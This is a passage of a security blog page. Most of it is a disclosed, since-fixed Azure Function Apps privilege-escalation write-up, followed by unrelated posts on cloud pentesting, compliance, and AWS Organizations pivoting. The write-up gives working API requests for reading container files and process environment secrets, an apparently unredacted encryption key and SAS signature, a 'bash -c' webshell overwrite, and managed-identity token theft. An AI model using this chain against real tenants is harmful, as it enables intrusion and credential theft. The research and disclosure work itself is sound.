Changing this parameter allows us to now see the direct file system of the container. In this first case, we’re looking at a Windows Function App container. As a test harness, we’ll use a little PowerShell to grab a “management.azure.com” token from our authenticated (as a Reader) Azure PowerShell module session, and feed that to the API for our requests to read the files from the vfspoc Function App. 

$mgmtToken = (Get-AzAccessToken -ResourceUrl 
"https://management.azure.com").Token 

(Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.
azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/
Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=
0&api-version=2021-01-15")) -Headers @{Authorization="Bearer 
$mgmtToken"}).Content | ConvertFrom-Json 

name   : data 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/data%2F?
relativePath=0&api-version=2021-01-15 
path   : D:\home\data 

name   : LogFiles 
size   : 0 
mtime  : 2022-09-12T20:20:02.5561162+00:00 
crtime : 2022-09-12T20:20:02.5561162+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/LogFiles%2
F?relativePath=0&api-version=2021-01-15 
path   : D:\home\LogFiles 

name   : site 
size   : 0 
mtime  : 2022-09-12T20:20:02.5701081+00:00 
crtime : 2022-09-12T20:20:02.5701081+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/site%2F?
relativePath=0&api-version=2021-01-15 
path   : D:\home\site 

name   : ASP.NET 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/ASP.NET%2F
?relativePath=0&api-version=2021-01-15 
path   : D:\home\ASP.NET

Access to Encryption Keys on the Windows Container

With access to the container’s underlying file system, we’re now able to browse into the ASP.NET directory on the container. This directory contains the “DataProtection-Keys” subdirectory, which houses xml files with the encryption keys for the application. 

Here’s an example URL and file for those keys:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/
tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs/
/ASP.NET/DataProtection-Keys/key-ad12345a-e321-4a1a-d435-4a98ef4b3
fb5.xml?relativePath=0&api-version=2018-11-01 

<?xml version="1.0" encoding="utf-8"?> 
<key id="ad12345a-e321-4a1a-d435-4a98ef4b3fb5" version="1"> 
  <creationDate>2022-03-29T11:23:34.5455524Z</creationDate> 
  <activationDate>2022-03-29T11:23:34.2303392Z</activationDate> 
  <expirationDate>2022-06-27T11:23:34.2303392Z</expirationDate> 
  <descriptor deserializerType="Microsoft.AspNetCore.DataProtection.
AuthenticatedEncryption.ConfigurationModel.AuthenticatedEncryptor
DescriptorDeserializer, Microsoft.AspNetCore.DataProtection, 
Version=3.1.18.0, Culture=neutral 
, PublicKeyToken=ace99892819abce50"> 
    <descriptor> 
      <encryption algorithm="AES_256_CBC" /> 
      <validation algorithm="HMACSHA256" /> 
      <masterKey p4:requiresEncryption="true" xmlns:p4="
https://schemas.asp.net/2015/03/dataProtection"> 
        <!-- Warning: the key below is in an unencrypted form. --> 
        <value>a5[REDACTED]==</value> 
      </masterKey> 
    </descriptor> 
  </descriptor> 
</key> 

While we couldn’t use these keys during the initial discovery of this issue, there is potential for these keys to be abused for decrypting information from the Function App. Additionally, we have more pressing issues to look at in the Linux container.

Command Execution on the Linux Container

Since Function Apps can run in both Windows and Linux containers, we decided to spend a little time on the Linux side with these APIs. Using the same API URLs as before, we change them over to a Linux container function app (vfspoc2). As we see below, this same API (with “relativePath=0”) now exposes the Linux base operating system files for the container:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : lost+found 
size   : 0 
mtime  : 1970-01-01T00:00:00+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/lost%2Bfound%2F?relativePath=0&api-version=2021-01-15 
path   : /lost+found 

[Truncated] 

name   : proc 
size   : 0 
mtime  : 2022-09-14T22:28:57.5032138+00:00 
crtime : 2022-09-14T22:28:57.5032138+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc%2F?relativePath=0&api-version=2021-01-15 
path   : /proc 

[Truncated] 

name   : tmp 
size   : 0 
mtime  : 2022-09-14T22:56:33.6638983+00:00 
crtime : 2022-09-14T22:56:33.6638983+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/tmp%2F?relativePath=0&api-version=2021-01-15 
path   : /tmp 

name   : usr 
size   : 0 
mtime  : 2022-09-02T21:47:36+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/usr%2F?relativePath=0&api-version=2021-01-15 
path   : /usr 

name   : var 
size   : 0 
mtime  : 2022-09-03T21:23:43+00:00 
crtime : 2022-09-03T21:23:43+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/var%2F?relativePath=0&api-version=2021-01-15 
path   : /var 

Breaking out one of my favorite NetSPI blogs, Directory Traversal, File Inclusion, and The Proc File System, we know that we can potentially access environmental variables for different PIDs that are listed in the “proc” directory.  

Description of the function of the environ file in the proc file system.

If we request a listing of the proc directory, we can see that there are a handful of PIDs (denoted by the numbers) listed:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : fs 
size   : 0 
mtime  : 2022-09-21T22:00:39.3885209+00:00 
crtime : 2022-09-21T22:00:39.3885209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/fs/?relativePath=0&api-version=2021-01-15 
path   : /proc/fs 

name   : bus 
size   : 0 
mtime  : 2022-09-21T22:00:39.3895209+00:00 
crtime : 2022-09-21T22:00:39.3895209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/bus/?relativePath=0&api-version=2021-01-15 
path   : /proc/bus 

[Truncated] 

name   : 1 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1/?relativePath=0&api-version=2021-01-15 
path   : /proc/1 

name   : 16 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/16/?relativePath=0&api-version=2021-01-15 
path   : /proc/16 

[Truncated] 

name   : 59 
size   : 0 
mtime  : 2022-09-21T22:00:38.6785209+00:00 
crtime : 2022-09-21T22:00:38.6785209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/59/?relativePath=0&api-version=2021-01-15 
path   : /proc/59 

name   : 1113 
size   : 0 
mtime  : 2022-09-21T22:16:09.1248576+00:00 
crtime : 2022-09-21T22:16:09.1248576+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1113/?relativePath=0&api-version=2021-01-15 
path   : /proc/1113 

name   : 1188 
size   : 0 
mtime  : 2022-09-21T22:17:18.5695703+00:00 
crtime : 2022-09-21T22:17:18.5695703+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1188/?relativePath=0&api-version=2021-01-15 
path   : /proc/1188

For the next step, we can use PowerShell to request the “environ” file from PID 59 to get the environmental variables for that PID. We will then write it to a temp file and “get-content” the file to output it.

$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token 

Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/59/environ?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"} -OutFile .\TempFile.txt 

gc .\TempFile.txt 

PowerShell Output - Newlines added for clarity: 
CONTAINER_IMAGE_URL=mcr.microsoft.com/azure-functions/mesh:3.13.1-python3.7 
REGION_NAME=Central US  
HOSTNAME=SandboxHost-637993944271867487  
[Truncated] 
CONTAINER_ENCRYPTION_KEY=bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=  
LANG=C.UTF-8  
CONTAINER_NAME=E9911CE2-637993944227393451 
[Truncated]
CONTAINER_START_CONTEXT_SAS_URI=https://wawsstorageproddm1157.blob.core.windows.net/azcontainers/e9911ce2-637993944227393451?sv=2014-02-14&sr=b&sig=5ce7MUXsF4h%2Fr1%2BfwIbEJn6RMf2%2B06c2AwrNSrnmUCU%3D&st=2022-09-21T21%3A55%3A22Z&se=2023-09-21T22%3A00%3A22Z&sp=r
[Truncated]

In the output, we can see that there are a couple of interesting variables. 

  • CONTAINER_ENCRYPTION_KEY 
  • CONTAINER_START_CONTEXT_SAS_URI 

The encryption key variable is self-explanatory, and the SAS URI should be familiar to anyone that read Jake Karnes’ post on attacking Azure SAS tokens. If we navigate to the SAS token URL, we’re greeted with an “encryptedContext” JSON blob. Conveniently, we have the encryption key used for this data. 

A screenshot of an "encryptedContext" JSON blob with the encryption key.

Using CyberChef, we can quickly pull together the pieces to decrypt the data. In this case, the IV is the first portion of the JSON blob (“Bad/iquhIPbJJc4n8wcvMg==”). We know the key (“bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=”), so we will just use the middle portion of the Base64 JSON blob as our input.  

Here’s what the recipe looks like in CyberChef: 

An example of using CyberChef to decrypt data from a JSON blob.

Once decrypted, we have another JSON blob of data, now with only one encrypted chunk (“EncryptedEnvironment”). We won’t be dealing with that data as the important information has already been decrypted below. 

{"SiteId":98173790,"SiteName":"vfspoc2", 
"EncryptedEnvironment":"2 | Xj[REDACTED]== | XjAN7[REDACTED]KRz", 
"Environment":{"FUNCTIONS_EXTENSION_VERSION":"~3", 
"APPSETTING_FUNCTIONS_EXTENSION_VERSION":"~3", 
"FUNCTIONS_WORKER_RUNTIME":"python", 
"APPSETTING_FUNCTIONS_WORKER_RUNTIME":"python", 
"AzureWebJobsStorage":"DefaultEndpointsProtocol=https;AccountName=
storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;EndpointSuffix=
core.windows.net", 
"APPSETTING_AzureWebJobsStorage":"DefaultEndpointsProtocol=https;
AccountName=storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;
EndpointSuffix=core.windows.net", 
"ScmType":"None", 
"APPSETTING_ScmType":"None", 
"WEBSITE_SITE_NAME":"vfspoc2", 
"APPSETTING_WEBSITE_SITE_NAME":"vfspoc2", 
"WEBSITE_SLOT_NAME":"Production", 
"APPSETTING_WEBSITE_SLOT_NAME":"Production", 
"SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.blob.core.
windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-02-14&sr=b&
sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"APPSETTING_SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.
blob.core.windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-
02-14&sr=b&sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"WEBSITE_AUTH_ENCRYPTION_KEY":"F1[REDACTED]25", 
"AzureWebEncryptionKey":"F1[REDACTED]25", 
"WEBSITE_AUTH_SIGNING_KEY":"AF[REDACTED]DA", 
[Truncated] 
"FunctionAppScaleLimit":0,"CorsSpecializationPayload":{"Allowed
Origins":["https://functions.azure.com", 
"https://functions-staging.azure.com", 
"https://functions-next.azure.com"],"SupportCredentials":false},
"EasyAuthSpecializationPayload":{"SiteAuthEnabled":true,"SiteAuth
ClientId":"18[REDACTED]43", 
"SiteAuthAutoProvisioned":true,"SiteAuthSettingsV2Json":null}, 
"Secrets":{"Host":{"Master":"Q[REDACTED]=","Function":{"default":
"k[REDACTED]="}, 
"System":{}},"Function":[]}} 

The important things to highlight here are: 

  • AzureWebJobsStorage and APPSETTING_AzureWebJobsStorage 
  • SCM_RUN_FROM_PACKAGE and APPSETTING_SCM_RUN_FROM_PACKAGE 
  • Function App “Master” and “Default” secrets 

It should be noted that the “MICROSOFT_PROVIDER_AUTHENTICATION_SECRET” will also be available if the Function App has been set up to authenticate users via Azure AD. This is an App Registration credential that might be useful for gaining access to the tenant. 

While the jobs storage information is a nice way to get access to the Function App Storage Account, we will be more interested in the Function “Master” App Secret, as that can be used to overwrite the functions in the app. By overwriting the functions, we can get full command execution in the container. This would also allow us to gain access to any attached Managed Identities on the Function App. 

For our Proof of Concept, we’ll use the baseline PowerShell “hello” function as our template to overwrite: 

A screenshot of the PowerShell "hello" function.

This basic function just returns the “Name” submitted from a request parameter. For our purposes, we’ll convert this over to a Function App webshell (of sorts) that uses the “Name” parameter as the command to run.

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function 
processed a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. 
Pass a name in the query string or in the request body for a 
personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: 
",$cmdoutput)) 
} 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 

To overwrite the function, we will use BurpSuite to send a PUT request with our new code. Before we do that, we need to make an initial request for the function code to get the associated ETag to use with PUT request.

Initial GET of the Function Code:

GET /admin/vfs/home/site/wwwroot/HttpTrigger1/run.
ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 

HTTP/1.1 200 OK 
Content-Type: application/octet-stream 
Date: Wed, 21 Sep 2022 23:29:01 GMT 
Server: Kestrel 
ETag: "38aaebfb279cda08" 
Last-Modified: Wed, 21 Sep 2022 23:21:17 GMT 
Content-Length: 852 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 
[Truncated] 
}) 

PUT Overwrite Request Using the Tag as the “If-Match” Header:

PUT /admin/vfs/home/site/wwwroot/HttpTrigger1/
run.ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 
Content-Length: 851 
If-Match: "38aaebfb279cda08" 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function processed 
a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. 
Pass a name in the query string or in the request body for a 
personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: 
",$cmdoutput)) 
} 

# Associate values to output bindings by calling 
'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 


HTTP Response: 

HTTP/1.1 204 No Content 
Date: Wed, 21 Sep 2022 23:32:32 GMT 
Server: Kestrel 
ETag: "c243578e299cda08" 
Last-Modified: Wed, 21 Sep 2022 23:32:32 GMT

The server should respond with a 204 No Content, and an updated ETag for the file. With our newly updated function, we can start executing commands. 

Sample URL: 

https://vfspoc2.azurewebsites.net/api/HttpTrigger1?name=
whoami&code=Q[REDACTED]= 

Browser Output: 

Browser output for the command "whoami."

Now that we have full control over the Function App container, we can potentially make use of any attached Managed Identities and generate tokens for them. In our case, we will just add the following PowerShell code to the function to set the output to the management token we’re trying to export. 

$resourceURI = "https://management.azure.com" 
$tokenAuthURI = $env:IDENTITY_ENDPOINT + "?resource=
$resourceURI&api-version=2019-08-01" 
$tokenResponse = Invoke-RestMethod -Method Get 
-Headers @{"X-IDENTITY-HEADER"="$env:IDENTITY_HEADER"} 
-Uri $tokenAuthURI 
$body = $tokenResponse.access_token

Example Token Exported from the Browser: 

Example token exported from the browser.

For more information on taking over Azure Function Apps, check out this fantastic post by Bill Ben Haim and Zur Ulianitzky: 10 ways of gaining control over Azure function Apps.  

Conclusion 

Let’s recap the issue:  

  1. Start as a user with the Reader role on a Function App. 
  1. Abuse the undocumented VFS API to read arbitrary files from the containers.
  1. Access encryption keys on the Windows containers or access the “proc” files from the Linux Container.
  1. Using the Linux container, read the process environmental variables. 
  1. Use the variables to access configuration information in a SAS token URL. 
  1. Decrypt the configuration information with the variables. 
  1. Use the keys exposed in the configuration information to overwrite the function and gain command execution in the Linux Container. 

All this being said, we submitted this issue through MSRC, and they were able to remediate the file access issues. The APIs are still there, so you may be able to get access to some of the Function App container and application files with the appropriate role, but the APIs are now restricted for the Reader role. 

MSRC timeline

The initial disclosure for this issue, focusing on Windows containers, was sent to MSRC on Aug 2, 2022. A month later, we discovered the additional impact related to the Linux containers and submitted a secondary ticket, as the impact was significantly higher than initially discovered and the different base container might require a different remediation.  

There were a few false starts on the remediation date, but eventually the vulnerable API was restricted for the Reader role on January 17, 2023. On January 24, 2023, Microsoft rolled back the fix after it caused some issues for customers. 

On March 6, 2023, Microsoft reimplemented the fix to address the issue. The rollout was completed globally on March 8. At the time of publishing, the Reader role no longer has the ability to read files with the Function App VFS APIs. It should be noted that the Linux escalation path is still a viable option if an attacker has command execution on a Linux Function App. 

Back

3 Fundamentals for a Strong Cloud Penetration Testing Program

Cloud computing has transformed the way organizations operate, providing unparalleled flexibility, scalability, and cost-efficiency. However, with these benefits come new security challenges and emerging risks. As organizations increasingly move their operations to the cloud, ensuring the security and privacy of data has become more critical than ever. A robust cloud penetration testing program helps internal IT teams protect their organizations by identifying and mitigating security risks in the cloud.

A pitfall organizations face when building a cloud pentesting strategy is handling rapid cloud migration. An application hosted on-prem will have significantly different security requirements from one in the cloud. Cloud security controls can often be more complex with intricate nuances. Another pitfall is assuming that cloud services are secure by default. Even though the cloud provider manages some aspects around security, organizations still have a responsibility to understand what exactly is within their control to secure. Sometimes the default settings from the cloud provider are not always the most secure for every environment. This differs from a traditional security program because of the shared responsibility or “shared fate” model.

With this model in mind, organizations need to look at the key components of a comprehensive cloud penetration testing program in light of their business objectives to implement a secure cloud effectively.

Best Practices to Create a Cloud Penetration Testing Program 

Creating a secure cloud is a complex undertaking with decisions that need to be tailored to your business goals and tech stack. Thomas Elling and the Cloud Pentesting team have compiled three aspects of creating a cloud pentesting program that will help any team incorporate security protocols from ideation to deployment.

1. Building a secure cloud from the start 

Making security-conscious design decisions from the start of a cloud adoption helps IT teams avoid retroactive decisions that result in rework and disjointed integration of technologies. It’s important to consider this from a human element and a technical one. For example, from the human lens, consider partnering security engineers and pentesters with DevOps groups to create secure by default environments. Whereas from a technical standpoint, consider using Infrastructure as Code (IaC) adoption to help enforce a security baseline.

2. Performing regular configuration reviews and pentesting 

Regular configuration reviews and cloud pentesting exercises are extremely valuable because of their ability to focus remediation efforts on prioritized vulnerabilities. Identifying security misconfigurations is a critical first step to securing an environment, which makes configuration reviews so imperative. They should be done on a regular basis to identify factors such as inadvertent public access or excessive IAM permissions.

Pentesting is another integral part of cloud security which aims to demonstrate the impact of the identified misconfigurations. This often includes chaining misconfigurations together to prove privilege escalation. The key difference between this and a typical configuration review is the fact that pentests leverage misconfigurations to demonstrate the potential impact of a successful attack. Oftentimes, the full impact of a misconfiguration is not fully understood until it is paired with one or more other vulnerabilities in the environment.

3. Establishing security guardrails 

Guardrails are sets of automated policies and controls that are designed to prevent or mitigate security risks and ensure compliance with security standards and regulations. Results of configuration reviews and pentests should always be discussed to identify the root cause. If a vulnerability was introduced via configuration drift, one preventative action would be implementing a security guardrail to ensure that misconfigurations cannot be introduced in the future.

Whether your cloud infrastructure resides in AWS, Azure, or GCP, these three fundamentals will help internal teams build — and maintain — a secure cloud from all angles.

Refine Your Cloud Pentesting Program with NetSPI

These steps represent some of the basic ways to create a security-first cloud environment through regular review processes. While there is no one-size-fits-all approach, these points can be modified to fit any cloud environment. Ultimately, organizations should prioritize remediation of vulnerabilities with a risk-based approach.

Environments that carry higher risk, such as ones that deal with sensitive data or may have external exposure, would be candidates for more frequent reviews. One factor that could trigger a review is any fundamental change made by the cloud provider to a core service.

However, this is not to say that lower risk environments, like a dev environment with test data, is not important.  Escalation paths from dev environments into production can be extremely impactful. Lastly, organizations looking to build out and strengthen their cloud pentesting programs need to investigate the root cause of identified vulnerabilities in order to ensure that the same, or similar, issues do not happen again.

Working with a penetration testing partner to enhance cloud security can help streamline efforts and deliver value quickly. As a leader in offensive security, NetSPI helps companies establish and enhance their secure cloud strategies. Contact our security consultants to get started on a strong cloud penetration testing program.

Back

How to Build a Baseline Cybersecurity Posture with Security Compliance

NetSPI Field Chief Information Security Officer (CISO) and host of the Agent of Influence podcast, Nabil Hannan invited Senior Compliance Manager at Secureframe Marc Rubbinaccio on episode 53 to discuss how security fits into compliance, and vice versa.  

The conclusion? Compliance doesn’t equate to security, but it is a strong starting point. Cybersecurity compliance provides a trustworthy baseline to establish a more mature security posture, especially for companies that are beginning to build their cybersecurity program from the ground up.  

Dive into the highlights below, then head over to Agent of Influence and listen to the full episode. 

Secureframe is a part of the NetSPI Partner Program.
Click here to learn about the program and explore how to become a partner. 

Reframing the Mentality of Cybersecurity Compliance  

The sentiment around compliance often centers around meeting requirements, not building an effective security program — but Marc offers a refined perspective. He poses that this mentality may be more prevalent at enterprise organizations with advanced security processes, making the baseline security controls outlined in compliance more of a check-the-box exercise, as opposed to a preventative cybersecurity strategy. 

But following the baseline security controls outlined in security frameworks is a prime starting point for small businesses and growing organizations.  

Technology is evolving faster than compliance can keep up with, which has led to the PCI DSS council allowing a more customized approach to meeting requirements. This allows companies to keep their current systems and implementations in place, without the need to invest in expensive new technologies. If companies can prove what they’ve implemented meets the intent of the requirement, then these revised standards within PCI DSS v4.0 allow security teams to stay course. 

Choosing a Security Compliance Framework 

Common company activity that requires cybersecurity compliance includes storing, processing and transmitting data in a way that can impact the security of customer information. Marc advises listeners to first select a cybersecurity framework that could be required within their industry. For example, HIPAA for healthcare, or GDPR for organizations responsible for the privacy of European customer data. Choosing a security framework and sticking to it helps guide decisions throughout the many steps within a compliance journey. 

“In my opinion, SOC2 and ISO27001, these frameworks are an amazing way for startups and small businesses to build a baseline security posture that they can not only be proud of but also be confident that their customers’ data is indeed secure.”  

Marc Rubbinaccio, Secureframe

Marc recommends two frameworks for organizations starting their path toward cybersecurity compliance:  

  1. SOC2: The American Institute of Certified Public Accountants (AICPA) centers SOC 2 framework around five Trust Services Criteria: security, availability, processing integrity, confidentiality, and privacy. 
  2. ISO 27001: The International Organization for Standardization (ISO), in partnership with the International Electrotechnical Commission (IEC) developed ISO 27001 as the latest standard to continue handling information security. ISO 27001 encourages the adoption of an Information Security Management System to protect the confidentiality, integrity, and availability of information.  

These well-known security frameworks help organizations establish policies and procedures, access control, change management, and even risk management, resulting in an inherently stronger cybersecurity posture.

If defining the next steps toward a mature cybersecurity program is holding you back from making progress, NetSPI’s Security Advisory Services are here to propel you forward. Let’s have a conversation. 

Changes to PCI DSS v4.0 

Marc’s area of focus is PCI DSS, which recently released an updated version, PCI 4.0. Changes include stricter multifactor authentication and stronger password security requirements, among others. The organizations most impacted by these changes are the ones maintaining Self Assessment Questionnaires type A (SAQ A), which is used when merchants outsource all aspects of payment processing to a third-party service provider, such as capturing, storage, transmission of cardholder data.  

These changes were driven by the increase in e-skimming attacks on payment pages, a technology used to intercept the input of private information into a web form. To help combat these increasing attacks, SAQ A now requires controls around any script executed in the customer’s browser in addition to external vulnerability scanning. 

With all of these never-ending changes, what can internal IT teams do to keep up with security compliance? 

“The strongest and most powerful tool you have are the experts that you work with.” 

Marc Rubbinaccio, Secureframe

How Organizations Can Prepare for Changes to Security Compliance 

Keeping up with all the changes to compliance standards is difficult, which is why leaning on the people and tools around you are essential. When looking at best practices for keeping up with changes to security compliance, use your connections as a resource.  

Whether your organization partners with a third-party, or uses a particular auditor, you can lean on these experts for guidance on decisions to adhere to your chosen framework. It’s OK to reach out directly to your auditor to discuss the latest changes to the frameworks and how they may affect your environment as it stands today. These conversations will put you ahead of the game when it’s time for your next audit. 

The Intersection of Pentesting and Security Compliance 

Penetration testing is critical in vulnerability management programs because penetration testing takes vulnerability scanning a step further. Scanners perform fingerprinting against operating system and software versions compared to publicly released vulnerable versions, in addition to fuzzing, or mass-injecting data to discover vulnerabilities within input fields. They are a great tool for identifying assets and surface level vulnerabilities, while pentesting uses the data found by scanners to try and exploit a vulnerability and continue to pivot within your environment. 

The additional steps performed by penetration testing help internal teams discover deeper issues within their environment, prioritize risks and remediate gaps. Compliance frameworks have picked up how important pentests are, with some of them requiring penetration testing annually and when significant changes occur, including PCI, FedRAMP, and HITRUST.  

Compliance doesn’t equate to security, but these well-known frameworks are a strong starting point. Keep growing your security compliance education by listening Marc’s podcast episode here

Back

Pivoting Clouds in AWS Organizations – Part 2: Examining AWS Security Features and Tools for Enumeration

As mentioned in part one of this two-part blog series on pentesting AWS Organizations, a singular mindset with regard to AWS account takeovers might result in missed opportunities for larger corporate environments. Specifically, those that leverage AWS Organizations for account management and centralization. Identifying and exploiting a single misconfiguration or credential leak in the context of AWS Organizations could result in a blast radius that encompasses several, if not all, of the remaining AWS company assets.   

To help mitigate this risk, I pulled from my experience in AWS penetration testing to provide an in-depth explanation of key techniques pentesting teams can use to identify weaknesses in AWS Organizations. 

Read part one to explore organizations, trusted access, and delegated administration and dive into various pivoting techniques after showing the initial “easy win” via created (as opposed to invited) member accounts. 

In this section, we will cover additional and newer AWS Organizations security implications and demonstrate a new Pacu module I created for ease of enumeration. 

Table of Contents

Phishing with AWS Account Management

AWS Account Management is an organization-integrated feature that offers a few simple APIs for updating or retrieving an AWS account’s contact information. This presents an interesting phishing vector.

Assuming we have compromised Account A, enable trusted access for Account Management via the CLI. Note Account Management supports delegated administration as well but we are focusing on trusted access for this portion.

Figure 1: Enable Trusted Access
Figure 1: Enable Trusted Access

With trusted access now enabled, update the contact information for Account B changing items like address or full name to assist in a future social engineering attack. Note: I have not attempted social engineering with AWS by calling the AWS help desk or other contacts, nor am I sanctioning that. This would be more from the perspective of trying to trick an engineer or another representative who manages an AWS account at the company to get access.

Figure 2: Update Member Account Contact Information
Figure 2: Update Member Account Contact Information
Get started identifying cloud misconfigurations and other security issues on your AWS infrastructure. Learn more about NetSPI's AWS Penetration Testing.

Delegated Policies – New Features, New Security Risks

AWS Organizations recently announced a new delegated administrator feature on November 27, 2022.  To summarize this release, AWS Organizations now gives you the ability to grant your delegated administrators more API privileges on top of the read-only access they previously gained by default. Only a subset of the Organization APIs dealing primarily with policy manipulation can be allow-listed for delegated administrators, and the allow-list implementation happens in the management account itself.  

In the image below, we used Account A to attach a Service Control Policy (SCP) to Account C that specifically denies S3 actions. A SCP can be thought of as an Identity and Access Management (IAM) policy filter. SCPs can be attached to accounts (like below) or organization accounts (OUs) and propagate downwards in terms of the overall organization hierarchy. They override any IAM privileges at the user/role level for their associated attached accounts. So even if users or roles in Account C have policies normally granting them S3 actions, they would still be blocked from calling S3 actions as the SCP at the organization-level takes precedence.  

Given this setup and the newly released feature, if a management account grants delegated administrators overly permissive rights in terms of policy access/manipulation, delegated administrators could remove restrictive SCPs from their own account or other accounts they control.

Figure 2: SCP Attached to Account C by Account A
Figure 2: SCP Attached to Account C by Account A

To enable the newer feature, navigate to the Settings tab in Account A and click “Delegate” in the “Delegated administrator for AWS Organizations” panel. In the delegation policy’s “Action” key, add organization APIs from the subset provided in the AWS user guide

Note that the actions added include the API calls for attaching and detaching any policy (AttachPolicy/DetachPolicy). Once the actions have been chosen, they are only granted to the member account if the delegation policy lists the member account number as a Principal (Account C in this scenario).

Figure 3: Allowing Policy Management by Delegated Administrators
Figure 3: Allowing Policy Management by Delegated Administrators
Figure 4: Create Policy To be Applied to Delegated Administrators
Figure 4: Create Policy To be Applied to Delegated Administrators

With this setup complete, we can switch to the attacker’s perspective. Assume that we have compromised credentials for Account C and already noted through reconnaissance that the compromised account is a delegated administrator. At this point in our assessment, we want to get access to S3 data but keep getting denied as seen below in Figure 4.

Figure 4: Try to list S3 Buckets as Account C
Figure 4: Try to list S3 Buckets as Account C

This makes sense as there is an SCP attached to Account C preventing S3 actions. But wait… with the new AWS Organization feature we as delegated admins might have additional privileges related to policy management that are not immediately evident. So, while still in Account C’s AWS Organization service, try to remove the SCP policy created by Account A from Account C.

Figure 5: View Attached Policies and Try to Detach as Account C
Figure 5: View Attached Policies and Try to Detach as Account C

Since the management account delegated us the rights to detach policy, the operation is successful, and we can now call S3 APIs as seen below in Figure 6. 

Figure 6: Observe Successful Detachment as Account C
Figure 6: Observe Successful Detachment as Account C
Figure 7: List S3 Buckets as Account C
Figure 7: List S3 Buckets as Account C

Rather than a trial-and-error method, you could also call the “describe-resource-policy” API as Account C and pull down the policy that exists in Account A. Remember that delegated administrators have read-only access by default so this should be possible unless otherwise restricted.

Figure 8: Retrieve Delegation Policy Defined in Account A as Account C
Figure 8: Retrieve Delegation Policy Defined in Account A as Account C

